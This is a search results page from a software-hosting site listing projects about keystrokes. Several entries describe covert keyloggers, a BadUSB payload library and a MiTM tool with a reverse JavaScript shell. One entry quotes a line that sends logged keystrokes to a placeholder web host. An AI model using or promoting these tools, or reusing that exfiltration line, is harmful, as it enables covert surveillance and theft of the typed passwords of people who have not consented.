Showing 18 open source projects for "keystrokes"

View related business solutions
  • MongoDB Atlas runs apps anywhere Icon
    MongoDB Atlas runs apps anywhere

    Deploy in 115+ regions with the modern database for every enterprise.

    MongoDB Atlas gives you the freedom to build and run modern applications anywhere—across AWS, Azure, and Google Cloud. With global availability in over 115 regions, Atlas lets you deploy close to your users, meet compliance needs, and scale with confidence across any geography.
    Start Free
  • Forever Free Full-Stack Observability | Grafana Cloud Icon
    Forever Free Full-Stack Observability | Grafana Cloud

    Our generous forever free tier includes the full platform, including the AI Assistant, for 3 users with 10k metrics, 50GB logs, and 50GB traces.

    Built on open standards like Prometheus and OpenTelemetry, Grafana Cloud includes Kubernetes Monitoring, Application Observability, Incident Response, plus the AI-powered Grafana Assistant. Get started with our generous free tier today.
    Create free account
  • 1
    Laravel CSP

    Laravel CSP

    Set content security policy headers in a Laravel app

    By default, all scripts on a webpage are allowed to send and fetch data to any site they want. This can be a security problem. Imagine one of your JavaScript dependencies sends all keystrokes, including passwords, to a third party website. It's very easy for someone to hide this malicious behaviour, making it nearly impossible for you to detect it (unless you manually read all the JavaScript code on your site). For a better idea of why you really need to set content security policy headers, read this excellent blog post by David Gilbertson. ...
    Downloads: 9 This Week
    Last Update:
    See Project
  • 2
    BadUSB

    BadUSB

    Flipper Zero badusb payload library

    This project explores USB device emulation attacks—commonly called BadUSB—by demonstrating how commodity USB hardware can impersonate keyboards, network adapters, or storage devices to perform scripted actions on a host. It typically contains firmware examples, payloads, and explanations showing how a device presenting as a Human Interface Device (HID) can inject keystrokes, open shells, or orchestrate data exfiltration when plugged into a machine. The codebase is frequently intended for security research and defensive testing: defenders and red teams use it to validate endpoint controls, USB whitelisting, and user training. Due to the dual-use nature of such techniques, responsible repositories emphasize lab-only experiments, consent-based testing, and mitigations like disabling autorun, enforcing device policies, and using endpoint detection.
    Downloads: 19 This Week
    Last Update:
    See Project
  • 3
    SecureDel

    SecureDel

    Secure File Deletion

    SecureDel is a small utility that does not require installation and can be used directly from a USB drive. The program is very lightweight, very easy to use, very fast, and uses six different deletion algorithms. It does not leave any trace in the system where it acts and performs deletions in such a way that deleted files can no longer be recovered. It generates a report after each deletion to display the processing times. SecureDel 1.2.3 Released. Good Deletion!
    Downloads: 10 This Week
    Last Update:
    See Project
  • 4

    Keylogger

    A simple keylogger for Windows, Linux and Mac

    Keylogger is a simple keystroke logger for Windows, Mac and Linux. A keystroke logger or keylogger is basically a program that records keystrokes and saves them in a log file on your local computer. This keylogger is simple and bare bones, but works wonderfully and is useful for a number of things. You can use it to track key movements and make sure no one is using your computer while you’re away, or use it for self-analysis. In businesses and offices it can be used to monitor employee activity; in schools it can track keystrokes and log banned words.
    Downloads: 58 This Week
    Last Update:
    See Project
  • Gemini 3 and 200+ AI Models on One Platform Icon
    Gemini 3 and 200+ AI Models on One Platform

    Access Google's best plus Claude, Llama, and Gemma. Fine-tune and deploy from one console.

    Build generative AI apps with Vertex AI. Switch between models without switching platforms.
    Start Free
  • 5
    Injectify

    Injectify

    Perform advanced MiTM attacks on websites with ease

    ...Injectify is a modern web based MiTM tool, similiar to BeEF (although completely unrelated in terms of source code). It features cross-platform clients (Web, Desktop, Browser extension). Create a reverse Javascript shell between the victim and the attacker. Records keystrokes and logs them to a database.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6

    Personal Productivity Tool

    Time tracking and recording multiple screens and keystrokes

    Enables multiple screen capture and key stroke recording. Not meant to run hidden but is for tracking personal productivity where an individual requires time-sheets to be filled in or to track activity for playback and recovery automatically. Does not connect over the network or try upload any files. All capture is local and virus free. This is meant to be a productivity tracker and not a key logging tool on other users machines. That is why it is not a service and not hidden. Refer to the...
    Downloads: 2 This Week
    Last Update:
    See Project
  • 7
    PAC Manager
    PAC is a Perl/GTK replacement for SecureCRT/Putty/etc (linux ssh/telnet/... gui)... It provides a GUI to configure connections: users, passwords, EXPECT regular expressions, macros, etc. You like 'SecureCRT/SSHMenu'? Check this tool and let me know
    Leader badge
    Downloads: 180 This Week
    Last Update:
    See Project
  • 8
    Free Keylogger for Mac and PC

    Free Keylogger for Mac and PC

    Free Keylogger for Mac OS X and PC

    ...Keylogger for Mac free, the invisible keylogger for Mac OS X with multiple-user support, has the ability to monitor all the activities on the targeted Mac, including keystrokes typed, IM chatting conversations entered, comments posted on social media, websites visited and so on. The free keylogger is limited in email delivery, while the Keylogger for Mac Standard secretly sends log reports to your Email box in interval for remote log viewing.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 9

    The Max KeyLogger

    Usefull keylogger to keep track of your kids ect.

    This keylogger will provide you with access to keystokes, as well as screenshots of your user. This product emails the keystrokes in a readable format with logging data.
    Downloads: 0 This Week
    Last Update:
    See Project
  • Enterprise-grade ITSM, for every business Icon
    Enterprise-grade ITSM, for every business

    Give your IT, operations, and business teams the ability to deliver exceptional services—without the complexity.

    Freshservice is an intuitive, AI-powered platform that helps IT, operations, and business teams deliver exceptional service without the usual complexity. Automate repetitive tasks, resolve issues faster, and provide seamless support across the organization. From managing incidents and assets to driving smarter decisions, Freshservice makes it easy to stay efficient and scale with confidence.
    Try it Free
  • 10
    Key Logger MAX

    Key Logger MAX

    Usefull keylogger to keep track of your kids ect.

    This keylogger will provide you with access to keystokes, as well as screenshots of your user. This product emails the keystrokes in a readable format with logging data.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 11

    JCryptor

    JCryptor is an encrypting tool based on the Caesar-cipher.

    JCryptor uses the Caesar-cipher to encrypt keystrokes on-the-fly. It can also be used to decrypt an encrypted text easily. Caesar-cipher is a simple encryption algorithm, developed by Julius Caesar, to encrypt his correspondence with Cicero in the ancient world. Therefore it uses a simple character substitution method to replace a given character by another. A keyshift of thirteen is called ROT13.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 12
    apps tracker

    apps tracker

    Computer monitoring & time tracking app

    apps tracker is all in one computer monitoring and time tracking solution. Some of the features are: activitiy logging, keystrokes capturing, screenshots, email reports, application blocking, file change monitoring ... UI is inspired by "Metro" design, built with WPF Requires Microsoft .NET framework v4.5 Download page includes a setup file for installing the app and the zip file as portable version where no installation is necessary
    Downloads: 0 This Week
    Last Update:
    See Project
  • 13
    Skope Surveillance Suite [DEPRECATED]

    Skope Surveillance Suite [DEPRECATED]

    Monitor Activity on your Computer by Auto Screenshot Capture

    ...A SkopeShot is a packaged number of images that were taken from the screen at a specified delay interval. These are designed to give you a rough idea of your child or other computer user's online activities. Additionally, the Keylog section displays recordings of keystrokes on the computer and how they correlate with the SkopeShots that were taken. **UPDATE!** Version 1.6 is out.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 14

    Linux kernel key logger

    A Linux kernel module for logging keystrokes

    A Linux kernel module to sniff keystrokes and saving it in an in memory buffer for further reading from /dev/klg
    Downloads: 0 This Week
    Last Update:
    See Project
  • 15
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 0 This Week
    Last Update:
    See Project
  • 16

    VB6 KeyLog

    A simple keylogger for visual basic 6

    A simple keylogger written in VB6. Source included. No viruses - of course. Don't take my word, read through the source and build yourself! It was written by mj-thompson, a 15 year old, to show off to computer teachers :p FOR LEGAL USE ONLY.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 17
    Strokey is a small hardware keyboard logger saving all keystrokes into an EEPROM memory for later investigation. The device may get attached to any PS/2-keyboard by intercepting the cable, or get placed directly inside for maximum invisibility.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 18
    sudosh is a sudo shell, filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session as just like a VCR.
    Downloads: 16 This Week
    Last Update:
    See Project
  • Previous
  • You're on page 1
  • Next
MongoDB Logo MongoDB